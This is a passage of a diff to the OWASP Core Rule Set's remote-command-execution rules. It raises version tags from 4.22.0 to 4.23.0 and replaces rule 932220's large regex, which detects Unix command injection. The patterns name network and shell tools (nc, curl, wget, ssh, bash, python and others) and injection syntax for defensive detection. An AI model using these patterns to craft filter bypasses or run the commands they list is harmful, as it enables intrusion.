 setvar:'tx.932205_matched_var_name=%{matched_var_name}',\
 chain"
@@ -1171,7 +1243,7 @@ SecRule REQUEST_HEADERS:Referer "@rx ^[^\.]*?(?:['\*\?\x5c`][^\n/]+/|/[^/]+?['\*
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-RCE',\
 tag:'capec/1000/152/248/88',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.932206_matched_var_name=%{matched_var_name}',\
 chain"
@@ -1213,7 +1285,7 @@ SecRule REQUEST_HEADERS:Referer "@rx #.*" \
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-RCE',\
 tag:'capec/1000/152/248/88',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.932207_matched_var_name=%{matched_var_name}',\
 chain"
@@ -1237,7 +1309,7 @@ SecRule REQUEST_HEADERS:Referer "@rx #.*" \ # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 932220 # -SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i).\|(?:[\s\x0b]*|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!
#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[\s\x0b&\),<>\|]|$).*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:7[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[arx][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?|(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[89][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?9|[au][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|c|(?:m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?p|s[\"'\)\[\x5c]*(?:
(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[dfu]|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g)|f[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[cdgi]|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p)|h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p)|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:p|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b)|j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s|q)|k[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r|v)|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[cl]|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|(?:p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?m)|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[dt]|[gu]|(?:s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?h|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@
_a-\{]*)?\x5c?n)|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[cr]|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l|[co][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[ex]|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c)|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|l)|(?:v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i|y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:3[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|c)|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|z)|z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h))[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[bx]|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|q[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?)|l[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#
\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?|(?:[nps]|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:4[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?)|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[dv]|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?))(?:[\s\x0b&\),<>\|]|$).*|a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?-[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[&\),<>\|]|$){1,10}|(?:[\-\.0-9A-Z_a-z][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?){1,10}(?:[\s\x0b&\),<>\|\}]|$){1,10})|(?:(?:b|(?:p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?t|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[ks])[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[jp][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?|s[\
"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?)(?:[\s\x0b&\),<>\|]|$).*)|g[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[&\),<>\|]|$){1,10}|(?:[\-\.0-9A-Z_a-z][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?){1,10}(?:[\s\x0b&\),<>\|\}]|$){1,10})|(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|[hr][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|o|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*)|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:(?:[at][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|f|k[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?)(?:[\s\x0b&\),<>\|]|$).*|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9
\?@_a-\{]*)?\x5c?(?:(?:[&\),<>\|]|$){1,10}|(?:[\-\.0-9A-Z_a-z][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?){1,10}(?:[\s\x0b&\),<>\|\}]|$){1,10}|(?:[\s\x0b&\),<>\|]|$).*))))" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i).\|(?:[\s\x0b]*|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\
s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|].*|o[\"'\)\[\x5c]*(?: